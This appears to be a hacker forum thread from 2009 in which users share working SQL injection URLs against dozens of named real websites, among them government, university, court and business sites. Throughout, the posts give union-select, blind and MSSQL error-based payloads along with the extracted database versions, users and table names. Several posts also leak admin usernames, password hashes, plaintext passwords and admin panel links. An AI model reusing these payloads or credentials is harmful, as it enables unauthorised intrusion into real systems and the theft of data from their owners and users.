version: 5.0.75-log
database: vdomdk1u_tehnika
user: vdomdk1u_vdom@c9-w.ht-systems.ru
M.W.N.N.
30.04.2009, 16:33
http://www.natural-immunogenics.com/news_detail.php?NewsID=7+union+select+1,2,version( ),4,5,6,7,8+limit+1,1/*
version():4.1.22
database():naturalimm
user():niuser@localhost
erihtoney
30.04.2009, 16:37
http://www.disy.org/activecoach/produkte/produkt.php?ID=100+union+select+1,2,
3,4,5,6,7,8
,concat_ws(0x3a20203a,version(),user(),
database())--
version:4.0.18-nt
user:AK51@WEBSERVER1
database:ak51
_________________________________
http://www.hollybaby.org/news.php?id=-1+union+select+1,concat_ws(0x203a20,
user(),version(),database()),3,4,5,6,7,8,9--
version:4.0.15-nt
user:tronslien@64-141-114-108.static.dns77.com
database:tronslien
http://www.anunturiutilajeconstructii.ro/detal.php?id=-737+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,concat_ws(0x3a,version(),database(),us er()),20,21,22,23,24,25,26--
5.0.77-community:utilcon_anunturi:utilcon_alin881@localho st
http://www.esunaganga.com/articulos.promocionales/show.detal.php?id=-355+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12--
4.1.22-standard:ganga_ganga2:ganga_gangaus@localhost
http://www.marcopolo.dk/php/rejser/detal.php?id=580+and+substring(@@version,1,1)=5
http://mapy.com.pl/index.php?right=detal.php&id=974+and+substring(@@version,1,1)=5
HAXTA4OK
30.04.2009, 20:16
something about the CSKA army club
http://www.peski.ru/index.php?action=stadium&id=-1+union+select+1,2,concat_ws(0x3a,version(),user() , database()),4,5,6,7,8,9,10,11--
4.0.27-log:peski@zvm3.host.ru:peski
TIC: 180
PR: 5
http://www.kordek.ru/news.php?id=-1'+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4/*
5.0.33:us5136j@localhost:db5136j
www.kordek.ru
TIC: 130
PR: 4
http://www.eurobabyshop.ru/divisions.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6--
5.0.67-log:u31546@10.10.153.191:u31546
there's a phpbb table, but I couldn't find the forum =\
http://www.eurobabyshop.ru/divisions.php?id=-1+union+select+1,2,3,table_name, 5,6+from+information_schema.tables--
TIC: 130
PR: 4
.:[melkiy]:.
30.04.2009, 21:10
http://www.cyprusvines.com/more_info.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Database Version: 5.0.67
Database name: cyprusvines_com
User name: root@localhost
There is access to mysql.user. Interesting table: cv_user
Login: root
Pass: 1a329e5f66335263
Login: admin
Pass: 266075ec3b7a2a5b
Admin panel:
http://www.cyprusvines.com/admin
DB:
http://www.cyprusvines.com/phpmyadmin
http://www.jewishpro.com/eventdetail.php?id=-35+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22--
Database Version: 4.1.20
Database name: jewishpro_com_-_db
User name: jpndb@localhost
HAXTA4OK
30.04.2009, 22:50
esoterics, damn))))
http://ezoterik.org/v_posveshmagia.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database())/*
5.0.32-Debian_7etch6-log:z95723_ezot@77.221.130.26:z95723_ezot
TIC: 70
PR: 4
------------------------------------------------------------------------
http://www.24sauna.ru/index.php?a=humor&page=-9&id=-1+union+select+1,concat_ws(0x3a,version(),user(), database())--
5.0.67-log:24sauna_dbu1@localhost:24sauna_db1
TIC: 10
PR: 0
------------------------------------------------------------------------
ПРОГРЕСС-СТРОЙ
Construction of wooden houses
http://prog-str.ru/index.php?action=goods&razdel=1&id=-1+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12--
5.0.51a-log:dusuy_prog@217.112.35.44:dusuy_prog
------------------------------------------------------------------------
http://www.bvnn.ru/indexf.php?act=art&id=-1+union+select+concat_ws(0x3a,version(),user(), database()),2--
4.1.22-standard:bvnnru_main@localhost:bvnnru_main
TIC: 20
PR: 2
------------------------------------------------------------------------
World of saunas )))
http://www.mir-saun.ru/view_news.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() , database()),4,5,6,7--
4.0.27-max-log:mirsaun6@v41.valuehost.ru:mirsaun6
TIC: 20
PR: 1
------------------------------------------------------------------------
http://www.studio-proekt.ru/quote.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(), user(), database())--
4.1.22-log:studiop6_dro@localhost:studiop6_studio
------------------------------------------------------------------------
http://www.black-rocks.ru/service.php?ID=-1+union+select+1,concat_ws(0x3a,version(), user(),database()),3,4,5,6,7,8--
5.0.67-community-log:blackroc_black@localhost:blackroc_blackrocks
TIC: 10
PR: 1
------------------------------------------------------------------------
http://nstec.ru/index.php?act=products&id=-1+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4--
4.1.22:art@localhost:nst
TIC: 10
PR: 2
------------------------------------------------------------------------
HAXTA4OK
30.04.2009, 23:52
http://lepel.by/articles_view.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10,11, 12--
5.0.32-Debian_7etch5-log:lepelby@localhost:lepelby
TIC: 20
PR: 2
there's a forum; I guessed the columns and the table)))))
http://lepel.by/articles_view.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,u ser_password),7,8,9,10,11,12+from+phpbb_users+limi t+ 1,1--
admin:80fea3c366ba45d21300be6518ca95f0
+++AndreyDevil+++
01.05.2009, 00:46
http://www.art.illinois.edu/news_detail.php?newsid=-65+union+select+1,2,3,4,5,6,7/*
---------------------------------
5.0.45
---------------------------------
art_illinois_edu@localhost
---------------------------------
art_uiuc_edu
---------------------------------
http://www.art.illinois.edu/admin/
admin : M3an#m
HAXTA4OK
01.05.2009, 00:59
http://www.laborcatalog.ru/articles/viewarticle.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9--
4.1.22-log:laborcat@localhost:wwwlaborcatalogr
molotovkeyt
01.05.2009, 05:42
PR - 3
http://www.marketflash.in/post/view_article.php?id=-1921+union+select+1,2,3,4,5,version(),7,8,9,0,1,2, 3,4--
Branch 4.
Didn't bother brute-forcing.
PR - 5
http://www.headsup.ie/view_article.php?id=-2+union+select+1,version(),3,4,5,6--
Branch 5.
Table headsup_admin
Columns admin_name:admin_real:admin_pass
Admin panel - http://www.headsup.ie/admin/index.php
mailbrush
01.05.2009, 09:38
http://moto-bike.ru/ss.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6/*mataru_moto@localhost:mataru_moto:5.0.26-log
Target: www.cfnielsen.dk
Evil link: http://www.cfnielsen.dk/news.php?id=-31'+union+select+1,2,3,4,5,6,concat_ws(0x203a20,us er(),database(),version(),@@version_compile_os)/*
Info:
user: cfn2008@mx2.euroteam.com
database: cfnielsen2008
version: 5.0.45
OS: redhat-linux-gnu - 2
M.W.N.N.
01.05.2009, 10:36
http://www.nolia.se/eurominexpo/index.php?id=9+union+select+1,2,3,4,concat_ws(0x3a ,version(),database(),user()),6,7,8+limit+1,1/*
version()4.0.27-standard
database():nolia_0
user():nolia@62.119.28.108
__
http://www.jba-design.se/products.php?id=27+union+select+1,2,concat_ws(0x3a ,version(),database(),user()),4,5,6,7,8,9,10,11,12 ,13,14,15/*
version()5.0.45-log
database():jba_design_se
user():_design_se@j9687@s79.loopia.se
__
http://www.tepg.se/showtitle.php?id=230+union+select+1,2,concat_ws(0x 3a,version(),database(),user()),4,5,6+limit+1,1
version()5.0.51a-24-log
database():wonderwork_db1
user():wonderwork_db1@192.168.0.52
http://www.tepg.se/showtitle.php?id=230+union+select+1,2,concat_ws(0x 3a,id,username,password),4,5,6+from+admin+limit+1, 1
1:hdnine:cb7ea8e5ad69ce0be6c3f1f0032dad4a
__
http://web.sbf.se/regler/visaregler.php?id=1+union+select+1,2,3,4,unhex(hex (concat(0x3a,version(),database(),user()))),6,7,8, 9,10,11,12,13,14/*
version()4.1.11
database():sbf
user():sbfweb@localhost
__
http://www.swedetab.se/visaTab.php?id=1799+union+select+1,concat_ws(0x3a, version(),database(),user()),3,4,5,6,7,8,9+limit+1 ,1/*
version()5.0.33-log
database():swedetab
user():swedetab@localhost
__
http://www.gggames.se/review.php?id=118+union+select+1,concat_ws(0x3a,ve rsion(),database(),user()),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
version()5.0.32-Debian_7etch10-log
database():gggames_se
user():gggames_se@srv113.one.com
__
http://www.apavi.lv/e-shop/lat/index.php?page=brand&id=63+union+select+concat_ws(0x3a,version(),databa se(),user())
version()4.1.22-standard-log
database():apavdb
user():apavadm@localhost
http://www.apavi.lv/e-shop/lat/index.php?page=brand&id=63+union+select+concat_ws(0x3a,id,user,pass,ema il)+from+users
35:y00:y00:
__
http://fast-anime.ru/shop/index.php?p=detail.php&g=18&Id=102%27+union+select+1,concat_ws(0x3a,version(), database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23+limit+1,1/*
version()5.0.32-Debian_7etch8-log
database():fast2007_shop
user():fast2007_shop@77.221.130.24
HAXTA4OK
01.05.2009, 10:50
http://olvexdiagnost.spb.ru/catalog/items_description.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),user(), database()),10,11,12,13,14,15,16,17--
5.0.24a-community-max-nt-log:1gb_olvexd@10.0.1.13:1gb_olvexd
TIC: 100
PR: 4
http://www.traunstein.com/landratsamt/show.php?ID=-53+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8--
5.0.51b-log:db198610:db198610@local3
http://keels-n-wheels.com/show.php?id=140246+union+select+1,2,3,4,5,6,7,8,9, 10,concat_ws(0x3a,version(),database(),user()),12, 13,14,15,16,17,18,19,20,21,22,23,24,25--
4.0.14-Max:knw:root@localhost
http://www.cs3r.org/show.php?id=10+and+substring(@@version,1,1)=4
_SEREGA_
01.05.2009, 11:17
http://www.evergladesfoundation.org/article.php?id=-10+union+select+1,concat_ws(0x3a,version(),%20user (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
5.0.67
HAXTA4OK
01.05.2009, 11:30
http://www.limceb.ie/events_detail.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9--
5.0.45-log:limceb_user@web11.hosting365.ie:limceb_databas e
TIC: 0
PR: 5
------------------------------------------------------------------------
http://www.carrigdhoun.ie/index.php?p=story&id=-1+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6--
5.0.45:carrigdhoun@localhost:carrigdhoun
------------------------------------------------------------------------
http://www.wineweb.ie/winemakers_view.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6--
5.0.45-log:wineweb_user@web14.hosting365.ie:wineweb_winew eb
erihtoney
01.05.2009, 11:59
One of the most visited news portals in Georgia dedicated to IT
http://inews.internet.ge/stat_relatives.html?date=2008-08-09&stat=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),
database()),6,7,8,9,10,11,12,13/*
version:5.0.32-Debian_7
user:etch1webuser@localhost
database:oldnews
http://inews.internet.ge/stat_relatives.html?date=2008-08-09&stat=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13+from+information_s
chema.tables+limit+58,1/*
tables: 58
HAXTA4OK
01.05.2009, 12:17
http://www.gspltd.ge/index.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(), database()),9,10,11,12,13,14,15--&lang=rus
4.0.27:gspltd_ge@localhost:gspltd_ge
TIC: 0
PR: 4
DezMond™
01.05.2009, 12:48
http://www.opendoors-de.org/details.php?id=122&idelement=-7702+union+select+1,2,3,4,5,6--&supp_page=news_archives
table:
users1
modelusers
modelcaddieusers
catalog_cartusers
cataloguepode_caddieusers
HAXTA4OK
01.05.2009, 13:05
http://www.wap-prague.org/index.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (), user())--
4.0.27-log:mysql19076:mysql11499@81.0.225.83
TIC: 0
PR: 4
Target: www.bahamassupremecourt.gov.bs
Evil link: http://www.bahamassupremecourt.gov.bs/rules.php?id=-160+union+select+1,2,3,4,5,6,concat_ws(0x2f,user() ,database(),version(),@@version_compile_os),8,9,10 ,11,12,13,14,15,16,17,18/*
Database info:
user: scourt@localhost
database: regatta_supremecourt
version: 5.0.45
Users (login:password:mail):
www.tkdpress.com
http://www.tkdpress.com/shop.php?training'&ID=7+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6
Version - 5.0.51a
User - U3966181@77.232.72.45
DB -U3966181
Tables with users:
http://www.tkdpress.com/shop.php?training'&ID=7+union+select+1,2,concat_ws(0x3a,username_clea n,password,email),4,5,6+from+users+limit+0,1
http://www.tkdpress.com/shop.php?training'&ID=7+union+select+1,2,concat_ws(0x3a,username,user _password),4,5,6+from+phpbb_users+limit+1,1
www.adrmotorsport.com
http://www.adrmotorsport.com/shop.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5
Version - 4.1.20
User - adr_root@localhost
DB - adr_news
www.lostrivercraft.com
http://www.lostrivercraft.com/shop.php?id=7+union+select+1,2,concat_ws(0x3a,vers ion(),user(),database()),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22/*
Version - 5.0.22
User - lostriver@localhost
DB - lostriver
http://www.emarketinganswers.com/qna/show.php?id=-428+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3--
5.0.22:ema_data:mork@localhost
http://www.telecomresearch.ru/show.php?id=-1275+union+select+1,unhex(hex(concat_ws(0x3a,versi on(),database(),user()))),3,4,5,6,7,8,9,10,11,12,1 3,14--
4.1.16-standard:telecomres_1:telecomres@lbarbero-2.m-10.ru
http://www.infogeo.ru/metalls/board/show.php?id=382884+and+substring(@@version,1,1)=5
http://www.wrm.ru/news/show.php?id=63+and+substring(@@version,1,1)=5
HAXTA4OK
01.05.2009, 15:31
http://www.maloneoregan.ie/page.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11, 12,13--
4.1.20:maloneoregan_ie_-_mor:maloneoregan@localhost
TIC: 0
PR: 3
mailbrush
01.05.2009, 16:11
http://www.millerab.com/projects-under-construction.php?ID=1+or+1=system_user
User: millerabreader
http://www.millerab.com/projects-under-construction.php?ID=1+or+1=db_name()
DB: millerab
http://www.millerab.com/projects-under-construction.php?ID=1+or+1=@@version
Version: Microsoft SQL Server 2005 - 9.00.3077.00 (X64) Dec 17 2008 20:40:08 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
MsSQL Injection
DezMond™
01.05.2009, 16:12
http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,group_concat(f_name,char(58), password,char(58),email,char(58),level),4,5,6,7,8, 9,10+from+users+--+
HAXTA4OK
01.05.2009, 16:15
http://www.alanmoore.ie/productDetails.php?id=1+union+select+1,concat_ws(0 x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
5.0.45-community-log:AlanMoo_alanmoore:AlanMoo_alanmoor@web9.hostin g365.ie
TIC: 0
PR: 4
mailbrush
01.05.2009, 16:28
http://www.designassociates.ie/keystaff.php?id=1+and+1=0+union+select+1,concat_ws (0x3a,user(),database(),version()),3,4+--+
general@localhost:Designassociates:5.0.24
http://www.designassociates.ie/keystaff.php?id=1+and+1=0+union+select+1,concat_ws (0x3a,user,password),3,4+from+mysql.user+--+
root:*1753F71060D207B40F2F70F752289368D0026D7B
HAXTA4OK
01.05.2009, 16:35
http://www.imro.ie/calendar/calendar.php?op=cat&id=-1'+union+select+1,2,concat_ws(0x3a,version(),datab ase(), user()),4,5,6/*
4.1.22:calendar:root@localhost
TIC: 10
PR: 6
------------------------------------------------------------------------
http://www.solicitor.ie/article.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (), user())--
5.0.45-log:finkeegan:mrfin@cgi0401.int.bizland.net
TIC: 0
PR: 3
------------------------------------------------------------------------
http://www.hanleyauctioneers.ie/content.php?id=-1+union+select+1,2,concat_ws(0x3a, version(),database(),user()),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40--
5.0.45:ghanleyproperty:claremorrisger@65.98.64.211
TIC: 0
PR: 2
------------------------------------------------------------------------
http://www.cellenergy.ie/information_center_indetail.php?id=-1+union+select+1,concat_ws(0x3a,version(), database(),user()),3,4,5,6--
5.0.67-community:celle3_cms:celle3_cms@localhost
TIC: 0
PR: 3
.:[melkiy]:.
01.05.2009, 17:02
Radio APLUS - the first internet station in the Republic of Belarus
http://music.aichyna.com/providers/?id=-1+union+select+1,2,3--
Database Version: 5.0.32-Debian_7etch8
Database name: aichyna_shoutcast
User name: shoutcast@localhost
Interesting tables: radio_login, bf_members_converge, ibf_members
TIC 600
HAXTA4OK
01.05.2009, 17:17
http://www.idc.ul.ie/people.php?id=-1+union+select+1,2,concat_ws(0x3a,version(), database(),user()),4,5,6,7,8,9,10,11,12--
4.1.20:idcweb:apache@localhost.2@ul.ie
TIC: 0
PR: 5
------------------------------------------------------------------------
http://www.crisispregnancy.ie/pressrelease.php?id=-1+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),u ser()),5,6--
5.0.27-community-nt:cpadb:cpauser@dinadan.blacknight.ie
PR: 6
spherics
01.05.2009, 17:28
Guys, serious privileges: sysadmin.
http://collusion.org/Article.cfm?ID=176%20or%201=@@version--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://collusion.org/Article.cfm?ID=176%20or%201=(select%20system_user)--
NT AUTHORITY\SYSTEM
http://collusion.org/Article.cfm?ID=176%20or%201=(select%20db_name())--
CollusionZine
HAXTA4OK
01.05.2009, 17:34
http://www.corporatereputations.ie/case_study.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(), user()),4,5,6,7,8,9,10--
5.0.45-community-log:nboyle_crdata:nboyle_crdbUse1@web1.hosting365. ie
PR: 2
------------------------------------------------------------------------
somebody's official site))
http://www.veliko-tarnovo.net/index.php?page=notice&type=t&id=-1'+union+select+1,concat_ws(0x3a,version(),databas e() ,u ser()),3,4,5/*
4.1.20:veliko-tarnovo_net_-_main3:vtarnovo@localhost
TIC: 10
PR: 5
erihtoney
01.05.2009, 18:27
Official website of the Indonesian police
PR:3
All tables:
http://www.simalungunkab.go.id/en/?id=-1+union+select+1,2,3,4,
group_concat(table_name),6+from+information_schema .tables--
version:5.0.67-community
user:simalung_root@localhost
database:simalung_simalungun
DezMond™
01.05.2009, 18:53
http://www.advancedstaffing.jobs/details.php?id=31+union+select+1,version(),databas e(),4,5,6,7,8,9/*
4.0.27-max-log
advstaff
www.monne.ru
http://www.monne.ru/?show=catalog&id=-34+union+select+1,2,3,4--
version()4.1.22-standard-log
database()monneru_main
user()monneru_adm@localhost
compile_os()pc-linux-gnu
www.armouredvehicles.net
http://www.armouredvehicles.net/vehicle.php?id=-107+union+select+1,2,3,4,concat_ws(0x203a20,versio n(%20),database(),user(),@@version_compile_os),6,7 ,8--
version()5.0.67-log
database()zbozi_mortarinvestments_eu
user()zbozi.mortarinvestments.eu@193.86.238.53
compile_os()unknown-linux-gnu
HAXTA4OK
01.05.2009, 19:04
http://www.bourgas-real-estate.com/show_news.php?id=-1+union+select+1,concat_ws(0x3a,version(),databa se(),us er()),3,4,5,6--
5.0.67-log:bourgas_real:bourgas_real@localhost
there is a table: rea_users =
http://www.bourgas-real-estate.com/show_news.php?id=-1+u nion+select+1,table_name,3,4,5,6+from+information_ schem a.tables+limit+46,1--
PR: 3
------------------------------------------------------------------------
http://www.gdi.gov.ge/index.php?lang=eng&id=1+union+select+1,concat_ws(0x3a,versi on(),databa se(),use r()),3,4,5,6--
5.0.77:gdigov_garemo:gdigov@localhost
PR: 2
tables:
contact
description
images
news
users
Blind SQL-inj
Target: www.strut.bm
Evil links:
http://www.strut.bm/products.php?page=1&categoryID=16+and+ascii(lower(substring(version(), 1,1)))=52 result: false
http://www.strut.bm/products.php?page=1&categoryID=16+and+ascii(lower(substring(version(), 1,1)))=53 result: true
etc.
Info:
version: 5.1.30
user: strutbm@localhost
database: strutbm_shoestore
HAXTA4OK
01.05.2009, 20:13
http://www.gepra.ge/eng/showserv.php?id=1'+union+select+1,2,concat_ws(0x3a ,version(),databa se(),us er()),4,5,6/*
4.1.13:gepra_ge:gepra.ge@localhost
TIC: 10
PR: 4
------------------------------------------------------------------------
http://www.backofthehouse.eu/news.php?lg=ge&id=1+union+select+1,2,3,concat_ws(0x3a,version(),d atab ase(),u ser()),5,6,7,8,9,10,11,12,13--
5.0.45-log:backofthehousech:both@localhost
_SEREGA_
01.05.2009, 21:13
SQLi:
5.0.67
http://www.helilooja.ee/emp_eng.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11--
info:
http://www.helilooja.ee/emp_eng.php?id=-25+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), 0x3a,database()),8,9,10,11--
HAXTA4OK
01.05.2009, 21:17
http://www.whpr.ie/menu.php?id=1&sid=-5+union+select+1,2,3,concat_ws(0x3 a,version( ),data base(),user()),5,6,7,8,9,10,11,12,13--
4.0.15:whpr:whpr@localhost
PR: 4
_SEREGA_
01.05.2009, 22:59
SQLi:
http://www.tsl.net.ru/index.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11--
4.0.26
info:
http://www.tsl.net.ru/index.php?id=-25+union+select+1,2,concat_ws(0x3a,user()),4,5,6,7 ,8,9,10,11--
tslnetru@localhost
<<Туры.ру>>
http://www.tury.ru/image.php?rgallery_id=9999999999/**/union/**/select/**/1,2,concat_ws(0x3a,version(),database(),user(),@ve rsion_compile_os),4,5,6,7,8,9,0,1--
5.0.70:TURY_data@10.0.50.9
DezMond™
02.05.2009, 01:17
http://bangla8.com/corporate/corp-jobs-details.php?id=-192+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2,13,14,15--
5.0.67-community
.:[melkiy]:.
02.05.2009, 01:44
http://www.mesagerul.ro/index.php?id=id:-00000043398+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15--
5.0.32-Debian_7etch8-log:mesagerul_ro:mesagerulălocalhost
erihtoney
02.05.2009, 08:15
_____________________
LSCA
PR:5
http://www.noxubee.lib.ms.us/bookclub/forum/forums.asp?iFor=12+union+select+1,
2,3,u_password,5,u_id
,7,8,9,10,11,12+from+users
_____________________
http://www.webypoku.ru/view.php?sec=1&id=-14+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8--
version: 5.0.67-percona-highperf-b7-log
database: tulluk
user: tulluk@localhost
http://www.webypoku.ru/view.php?sec=1&id=-14+union+select+1,2,3,4,group_concat(table_name),6 ,7,8+from+information_schema.tables--
tables:
DezMond™
02.05.2009, 11:44
http://www.saratogasoftwaresolutions.com/jobs/details.php?ID=-35+union+select+1,fullname,3,4,5,6,7,8,9,pwd,11,12 ,13,14+from+admin/*
Leanne Madsen
409f66041978caf7e6c02d17042f251d
http://www.expertalent.com/jobs/details.php?ID=-99+union+select+1,fullname,pwd,4,5,6,7,8,9,10,11,1 2,13+from+admin/*
Sam Harrison
601e399c8dfc646df0e1d39ff1e51645
PR5
http://www.housingnet.co.uk/jobs-details.php?jobid=297+union+select+version()--
4.0.27-standard
BlackPanther
02.05.2009, 12:40
Site:
http://www.canadiansoftwood.com/
SQL -
Vulnerable parameter:
http://www.canadiansoftwood.com/index.php?mode=news&id=1
http://www.canadiansoftwood.com/index.php?mode=news&id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),d atabase(),%20version()),3,4,5,6--
csidb1@localhost : mysql : 4.1.14
Table:
http://www.canadiansoftwood.com/index.php?mode=news&id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),d atabase(),%20version()),3,4,5,6+from+user--
mailbrush
02.05.2009, 12:59
http://news.rapmusic.tu2.ru/new.php?st=-1+union+select+1,concat_ws(0x3a,user(),database(), version())rapmusic3@localhost:rapmusic3:5.0.51a-log
http://avtolampy.com.ua/view.php?id=-288+union+select+concat_ws(0x3a,version(),database (),user())--
version: 5.0.45-log
database: avtolampy1_db
user: avtolampy1_db@s8
tables:
http://avtolampy.com.ua/view.php?id=-288+union+select+concat_ws(0x3a,id,name,username,e mail,password)+from+jos_users--
62:Administrator:admin:support@jr.net.ua:2cdcbe2c0 a133787ceeb5516360c1cde
admin:xlsqbq
BlackPanther
02.05.2009, 15:31
Site:
http://www.belvneshstrakh.by/
SQL -
Уязвимая перемен
http://www.belvneshstrakh.by/ru//?page=news&id=1+union+select+1,2,CONCAT_WS(CHAR(32,58,32),use r(),database(),%20version()),4,5,6,7--
bvs@localhost : belvneshstrakh_by : 5.0.45-log
http://www.belvneshstrakh.by/ru//?page=news&id=-1+union+select+1,2,CONCAT_WS(CHAR(32,58,32),user() ,database(),%20version()),4,group_concat(table_nam e),6,7+from+information_schema.tables--
Table:
mssql-inj
version
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=@@version--
db_name
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+db_name())--
system_user
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+system_user)--
tables
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+table_name+fr om+information_schema.tables+where+table_name+not+ in+('Poll','AdminVerify','dtproperties','sysconstr aints','syssegments'))--
columns of table AdminVerify
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+column_name+f rom++information_schema.columns+where+table_name=' AdminVerify'+and+column_name+not+in+('AdminName',' AdminPassword'))--
Data acquisition
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+cast(AdminNam e+as+nvarchar)%2B%27%3A%27%2Bcast(AdminPassword+as +nvarchar)+from+AdminVerify)--
DezMond™
02.05.2009, 17:58
PR5
http://cala.arizona.edu/events/eventdetails.php?id=-66+union+select+1,2,3,table_name,5,6,7,8,9,10+from +information_schema.tables+limit+25,100/*
tables:
password
users
passwords:
erihtoney
02.05.2009, 18:30
MSSQL
http://www.communication.go.ke/news.asp?id=93+union+select+1,2,3
,4,5,6,7,8+from+users
http://www.cherkov.org.ua/dis.php?nid=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4#
5.0.41-community:f4ltdcom_cherkov:f4ltdcom_vadim@localhos t
tables:
_______________________
http://kolesaonline.ru/diski_view.php?code=-20210054+union+select+1,2,3,4,5,6,7,8,9,10,concat_ ws(0x3a,version(),database(),user()),12--
4.1.22-log:kolesa:kolesa-sql@localhost
_______________________
http://www.crmru.info/library_article_view.php?article_id=7+union+select +1,2,3,4,5,6,concat_ws(0x3a,version(),database(),u ser()),8,9,10,11--
4.0.27-log:micro:micro@195.242.3.251
www.cosmicscoffee.com
http://www.cosmicscoffee.com/shops.php?cid=-611+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database())
Version - 5.0.45:
User - cosmicscof@localhost:
DB - cosmicscoffee
Table administrators
http://www.cosmicscoffee.com/shops.php?cid=-611+union+select+1,2,3,concat_ws(0x3b,user_name,us er_password)+from+administrators
kitchen;ac3a02e36381e883d05901ab270d6e80:63
.:[melkiy]:.
03.05.2009, 01:16
http://fabernet.com.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 4.1.22-standard-log
Database name: fabernet_fabernet
User name: fabernet_faber@localhost
Admin panel:
http://fabernet.com.ua/admin
http://silouette.com.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 5.0.67
Database name: silouette
User name: silouette@localhost
price_comments
Admin panel:
http://silouette.com.ua/admin
http://plastivka.com.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 5.0.67
Database name: lastivka
User name: lastivka@localhost
Admin panel:
http://plastivka.com.ua/admin
http://expertise.in.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 5.0.67
Database name: expertise
User name: expertise@localhost
Admin panel:
http://expertise.in.ua/admin
ILYAtirtir
03.05.2009, 05:03
Raiffeisen ASSET MANAGEMENT (Bulgaria)
http://ram.bg/bg/fund1'+and+substring(version(),1,1)=5--+
5th branch
user() = root@localhost
Head Center for Pre-Licensing Training
http://gcpp.ru/?id=1139+union+select+1,concat_ws(0x3a,database(), user(),version()),3,4,5,6,7,8,9,10,11/*
gcpp_cert:gcpp_gcpp@localhost:4.1.22-standard
http://gcpp.ru/?id=1139+union+select+1,concat_ws(0x3a,name,passwo rd),3,4,5,6,7,8,9,10,11+from+user/*
adm:tbontbtitq
oper:yrepa00
user:yyy123
Target: www.omwy.cc
Evil link: http://www.omwy.cc/en/news.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6
Info:
Version: 4.1.12
User: oumeiceramic_f@localhost
Database: oumeiceramic
BlackPanther
03.05.2009, 09:19
SQL -
http://www.nadona.org/calendar.php?id=-22+union+select+1,CONCAT_WS(CHAR(32,58,32),user(), database(),%20version()),3,4,5,6,7,8--
nadona_sql@localhost : nadona_admin : 5.0.27-standard
Since the version is greater than 5, we find out the tables....
http://www.nadona.org/calendar.php?id=-22+union+select+1,CONCAT_WS(CHAR(32,58,32),user(), database(),%20version()),GROUP_CONCAT(0x3a,0x3a,ta ble_name),4,5,6,7,8+from+information_schema.tables--
..::TROYAN::..
03.05.2009, 11:49
Some Chinese shop...
